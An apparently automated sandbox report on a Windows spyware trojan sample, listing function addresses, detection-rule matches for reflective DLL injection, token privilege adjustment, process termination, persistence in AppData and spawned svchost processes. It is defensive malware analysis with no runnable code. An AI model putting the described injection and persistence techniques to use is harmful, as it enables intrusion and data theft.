      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B8305B5C9_2_00007FF8B8305B5C
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B830FBE09_2_00007FF8B830FBE0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B8372C489_2_00007FF8B8372C48
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B8367BFC9_2_00007FF8B8367BFC
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B83A5E649_2_00007FF8B83A5E64
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B83A8DF89_2_00007FF8B83A8DF8
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B8330E159_2_00007FF8B8330E15
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B830FF609_2_00007FF8B830FF60
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B8302FA09_2_00007FF8B8302FA0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B832F0009_2_00007FF8B832F000
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B830D0309_2_00007FF8B830D030
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B83900BC9_2_00007FF8B83900BC
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B831D1209_2_00007FF8B831D120
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B83032749_2_00007FF8B8303274
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B83212009_2_00007FF8B8321200
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B83262D09_2_00007FF8B83262D0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B830C3609_2_00007FF8B830C360
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B83103009_2_00007FF8B8310300
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B83083109_2_00007FF8B8308310
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B830233C9_2_00007FF8B830233C
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B83223849_2_00007FF8B8322384
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B832C4299_2_00007FF8B832C429
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B830F5209_2_00007FF8B830F520
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B831F5A49_2_00007FF8B831F5A4
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B83116D09_2_00007FF8B83116D0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B83427409_2_00007FF8B8342740
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B83026F89_2_00007FF8B83026F8
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B83088549_2_00007FF8B8308854
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B83128B09_2_00007FF8B83128B0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB63CF09_2_00007FF8BFB63CF0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB637B09_2_00007FF8BFB637B0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB61A809_2_00007FF8BFB61A80
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB6521C9_2_00007FF8BFB6521C
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB626309_2_00007FF8BFB62630
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB61A809_2_00007FF8BFB61A80
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB631409_2_00007FF8BFB63140
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB62D309_2_00007FF8BFB62D30
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB76AE49_2_00007FF8BFB76AE4
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB72DD09_2_00007FF8BFB72DD0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB971CC9_2_00007FF8BFB971CC
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB9D1309_2_00007FF8BFB9D130
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BECFBA010_2_00007FF69BECFBA0
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BEE14C810_2_00007FF69BEE14C8
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BEDE47010_2_00007FF69BEDE470
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BEE1B8C10_2_00007FF69BEE1B8C
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BED5B8810_2_00007FF69BED5B88
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BECF20410_2_00007FF69BECF204
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BEE49B010_2_00007FF69BEE49B0
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BED38B410_2_00007FF69BED38B4
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BED884810_2_00007FF69BED8848
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BEE17DC10_2_00007FF69BEE17DC
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BEDD74410_2_00007FF69BEDD744
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BEE3EE410_2_00007FF69BEE3EE4
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BEE369010_2_00007FF69BEE3690
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BED5E2010_2_00007FF69BED5E20
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BEDDD6810_2_00007FF69BEDDD68
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68396E23C11_2_00007FF68396E23C
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68396E7CC11_2_00007FF68396E7CC
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838DC82411_2_00007FF6838DC824
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683970CD811_2_00007FF683970CD8
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68396EB3011_2_00007FF68396EB30
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838DCDD211_2_00007FF6838DCDD2
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683958D9411_2_00007FF683958D94
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839712A411_2_00007FF6839712A4
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68396773C11_2_00007FF68396773C
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838DD69011_2_00007FF6838DD690
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68396FA1C11_2_00007FF68396FA1C
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683951ED011_2_00007FF683951ED0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838F3E2011_2_00007FF6838F3E20
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839684A011_2_00007FF6839684A0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68391E27011_2_00007FF68391E270
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68394E28411_2_00007FF68394E284
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838C821811_2_00007FF6838C8218
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839501B011_2_00007FF6839501B0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68391293011_2_00007FF683912930
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838EC83011_2_00007FF6838EC830
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839507F811_2_00007FF6839507F8
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68392C75011_2_00007FF68392C750
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68396063811_2_00007FF683960638
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68395E68811_2_00007FF68395E688
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68395860C11_2_00007FF68395860C
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68395A61011_2_00007FF68395A610
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68394859411_2_00007FF683948594
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838EACF011_2_00007FF6838EACF0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683906AE011_2_00007FF683906AE0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683966AD011_2_00007FF683966AD0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68395EB1C11_2_00007FF68395EB1C
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683926B2011_2_00007FF683926B20
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683954A7C11_2_00007FF683954A7C
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68396104011_2_00007FF683961040
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683964E5411_2_00007FF683964E54
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838D2E8C11_2_00007FF6838D2E8C
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683962DE811_2_00007FF683962DE8
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68396CE3411_2_00007FF68396CE34
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839474C011_2_00007FF6839474C0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68394949811_2_00007FF683949498
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838F94A011_2_00007FF6838F94A0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68391937011_2_00007FF683919370
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839472BC11_2_00007FF6839472BC
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838CD31C11_2_00007FF6838CD31C
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683962DE811_2_00007FF683962DE8
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68395F19C11_2_00007FF68395F19C
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838CB87411_2_00007FF6838CB874
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839637E811_2_00007FF6839637E8
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68395181011_2_00007FF683951810
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839476C411_2_00007FF6839476C4
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68392F73011_2_00007FF68392F730
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838EB6B011_2_00007FF6838EB6B0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838C56A011_2_00007FF6838C56A0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839595D411_2_00007FF6839595D4
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683947D0811_2_00007FF683947D08
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683961B6011_2_00007FF683961B60
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683937B5011_2_00007FF683937B50
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839699F411_2_00007FF6839699F4
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839679B811_2_00007FF6839679B8
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838C606011_2_00007FF6838C6060
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68394808C11_2_00007FF68394808C
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838FBFE011_2_00007FF6838FBFE0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683903FB011_2_00007FF683903FB0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838DDED011_2_00007FF6838DDED0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68390FEC011_2_00007FF68390FEC0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683939F2011_2_00007FF683939F20
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68395FF3011_2_00007FF68395FF30
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838CDE8C11_2_00007FF6838CDE8C
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683939EB011_2_00007FF683939EB0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683955DC411_2_00007FF683955DC4
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683937DD011_2_00007FF683937DD0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68394DD7811_2_00007FF68394DD78
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: String function: 00007FF795D2DFBC appears 106 times
      Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF69BECDFBC appears 106 times
      Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF60BF9DFBC appears 106 times
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: String function: 00007FF7CA7925F0 appears 100 times
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: String function: 00007FF7CA792760 appears 36 times
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: String function: 00007FF6838EF7E0 appears 332 times
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: String function: 00007FF6838F61B0 appears 37 times
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: String function: 00007FF683907670 appears 39 times
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: String function: 00007FF6838F6220 appears 83 times
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: String function: 00007FF6838D7150 appears 45 times
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: String function: 00007FF6838EF6F0 appears 449 times
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: String function: 00007FF6838EF9A0 appears 44 times
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: String function: 00007FF6839075A0 appears 41 times
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: String function: 00007FF6838CA7DC appears 56 times
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: String function: 00007FF68396CC4C appears 73 times
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: String function: 00007FF68393A4EC appears 38 times
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: String function: 00007FF6838EF830 appears 52 times
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: String function: 00007FF60E62DFBC appears 106 times
      Source: api-ms-win-crt-time-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-runtime-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-math-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-convert-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-file-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-conio-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-string-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-rtlsupport-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-sysinfo-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-file-l1-2-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-process-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-heap-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-libraryloader-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-memory-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-environment-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-filesystem-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-heap-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-errorhandling-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-processthreads-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-stdio-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-util-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-interlocked-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-processenvironment-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-synch-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-string-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-console-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-file-l2-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-timezone-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-profile-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-localization-l1-2-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-locale-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-synch-l1-2-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-handle-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-utility-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-processthreads-l1-1-1.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-debug-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-datetime-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-namedpipe-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
      Source: 52kYJGCon6.exeBinary or memory string: OriginalFilename vs 52kYJGCon6.exe
      Source: 52kYJGCon6.exe, 00000000.00000003.2088246480.00000292ECAA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs 52kYJGCon6.exe
      Source: 52kYJGCon6.exe, 00000000.00000000.2077628767.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs 52kYJGCon6.exe
      Source: 52kYJGCon6.exeBinary or memory string: OriginalFilenameServices.exe2 vs 52kYJGCon6.exe
      Source: 3.3.explorer.exe.caf63f0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: 3.2.explorer.exe.caf63f0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: 3.2.explorer.exe.caf63f0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: 3.2.explorer.exe.8b70535.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: 3.3.explorer.exe.caf63f0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: 3.3.explorer.exe.caf63f0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: 3.2.explorer.exe.8b70535.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: 3.3.explorer.exe.caf63f0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: 3.2.explorer.exe.10a50000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: 3.3.explorer.exe.caf63f0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: 3.3.explorer.exe.caf63f0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: 3.2.explorer.exe.10a50000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: 11.0.tmp1946.exe.7ff6838c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: 11.2.tmp1946.exe.7ff6838c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/97@0/1
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7929E0 GetLastError,FormatMessageW,MessageBoxW,6_2_00007FF7CA7929E0
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D3060C GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_00007FF795D3060C
      Source: C:\Windows\explorer.exeCode function: 3_2_10A52EE0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,OpenProcess,CloseHandle,3_2_10A52EE0
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E63060C GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,4_2_00007FF60E63060C
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFA060C GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,5_2_00007FF60BFA060C
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BED060C GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,10_2_00007FF69BED060C
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D30E78 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,wcscmp,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,0_2_00007FF795D30E78
      Source: C:\Users\user\Desktop\52kYJGCon6.exeFile created: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859Jump to behavior
      Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\GqgWzd
      Source: C:\Users\user\Desktop\52kYJGCon6.exeFile created: C:\Users\user\AppData\Local\Temp\TH2200.tmpJump to behavior
      Source: 52kYJGCon6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\System32\svchost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 52kYJGCon6.exeReversingLabs: Detection: 65%
      Source: 52kYJGCon6.exeVirustotal: Detection: 46%
      Source: tmp1946.exeString found in binary or memory: /add
      Source: C:\Users\user\Desktop\52kYJGCon6.exeFile read: C:\Users\user\Desktop\52kYJGCon6.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\52kYJGCon6.exe "C:\Users\user\Desktop\52kYJGCon6.exe"
      Source: C:\Users\user\Desktop\52kYJGCon6.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe "C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe"
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp8AEF.exe "C:\Users\user\AppData\Local\Temp\tmp8AEF.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe "C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe"
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp8AEF.exe "C:\Users\user\AppData\Local\Temp\tmp8AEF.exe"
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
